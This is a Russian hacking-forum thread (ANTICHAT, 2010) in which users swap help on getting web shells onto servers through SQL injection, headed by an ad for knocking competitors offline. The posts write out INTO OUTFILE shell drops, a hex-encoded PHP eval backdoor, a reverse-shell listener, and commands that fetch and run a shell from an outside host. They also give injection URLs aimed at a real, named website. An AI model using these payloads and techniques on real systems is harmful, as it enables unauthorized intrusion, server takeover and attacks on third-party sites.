УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1479 из 2438

1479

Опции темы

Поиск в этой теме

Опции просмотра

#14781

18.08.2010, 05:04

Gedj

Познающий

Регистрация: 15.09.2008

Сообщений: 54

Провел на форуме:
612815

Репутация: 46

Заливаю шелл через sql и пишу +union+select+''+from+mysql.user+into+outfile+ту т путь

Фаил успешно заливается но при заходе на него пшет: Cannot execute a blank command in и путь

То есть при 232.php?cmd=phpinfo() просто выводиться пустая страница.

Что не так делаю?)

#14782

18.08.2010, 05:09

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от Gedj

Gedj said:
Заливаю шелл через sql и пишу +union+select+''+from+mysql.user+into+outfile+ту т путь
Фаил успешно заливается но при заходе на него пшет: Cannot execute a blank command in и путь
То есть при 232.php?cmd=phpinfo() просто выводиться пустая страница.
Что не так делаю?)

бро, system() это системная обалочка, если хочешь исполнять php код, надо через eval

#14783

18.08.2010, 05:18

Gedj

Познающий

Регистрация: 15.09.2008

Сообщений: 54

Провел на форуме:
612815

Репутация: 46

Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo() выводит Parse error: syntax error, unexpected $end in и и дальше путь

#14784

18.08.2010, 05:21

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от Gedj

Gedj said:
Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo()
;
выводит Parse error: syntax error, unexpected $end in и и дальше путь

попробуй захексить код

union+select+0x3c3f706870206576616c28245f4745545b5 c27636d645c275d29203f3e+into+outfile

#14785

18.08.2010, 05:32

a1ertso

Новичок

Регистрация: 16.12.2009

Сообщений: 29

Провел на форуме:
101927

Репутация: 0

Сервер: Linux 2.6.26-2

При попытке бэк-конекта, командная строка просто висит пока не нажму отмена:

Цитата:

Сообщение от None

listening on [any] 31337 ...

У меня Win 2000

Может фаервол сервера блокирует? Пробовал порт 80, тоже самое. В чем может быть проблема и есть ли решение?

#14786

18.08.2010, 10:14

kfor

Участник форума

Регистрация: 01.09.2005

Сообщений: 194

Провел на форуме:
818095

Репутация: 34

Отправить сообщение для kfor с помощью ICQ

Цитата:

Сообщение от Gedj

Gedj said:
Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo() выводит Parse error: syntax error, unexpected $end in и и дальше путь

Если ты можешь писать значит можешь и читать. сделай LOAD_FILE и посмотри что у тебя туда падает. Для начала попробуй ''

#14787

18.08.2010, 17:10

Gedj

Познающий

Регистрация: 15.09.2008

Сообщений: 54

Провел на форуме:
612815

Репутация: 46

Сервак Windows NT при заливке шела через sql пишу

Дальше при cmd=dir выводит директории

Вопрос как залить шел в Winows NT через cmd?

#14788

18.08.2010, 17:49

InfectedM

Познающий

Регистрация: 04.11.2007

Сообщений: 51

Провел на форуме:
310791

Репутация: 6

Отправить сообщение для InfectedM с помощью ICQ

http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version())--

почему вот тут кидает на главную, что можно сделать?

http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,SCHEMA_NAME)+from+in formation_schema.SCHEMATA+--+

#14789

18.08.2010, 17:49

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от Gedj

Gedj said:
Сервак Windows NT при заливке шела через sql пишу
Дальше при cmd=dir выводит директории
Вопрос как залить шел в Winows NT через cmd?

мен ты мне другое говорил )) если eval то

cmd=copy($_GET,$_GET[d]);&s=http://твойсайт/shell.txt&d=/директория/shell.php;

потом локальный инклуд(если директория не видно из веб)

при allow_url_include=On

cmd=include("http://твойсайт/shell.txt");

#14790

18.08.2010, 19:42

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

Добавлю еще один способ.

Требования: allow_url_fopen = on

cmd=eval(file_get_contents('http://site.ru/shell.txt'));

Удалить php дескрипторы в начале и конце шелла.

Преимущества: не нужно знать папку на запись.

Недостатки: больше следит в логах

Страница 1479 из 2438

1479

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход